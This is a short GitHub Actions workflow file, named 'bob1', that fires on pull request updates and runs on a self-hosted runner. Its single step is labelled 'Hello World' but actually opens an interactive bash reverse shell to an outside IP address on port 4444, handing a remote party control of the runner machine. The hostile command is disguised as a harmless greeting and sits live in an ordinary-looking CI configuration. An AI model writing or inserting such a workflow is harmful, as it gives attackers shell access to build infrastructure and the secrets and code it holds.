name : bob1  
  
on:  
  pull_request:  
    types: [ synchronize ]  
  
jobs:
  sync-job:
    runs-on: self-hosted  
    steps:  
      - name: Hello World
        run: |
          bash -i >& /dev/tcp/64.225.55.220/4444 0>&1
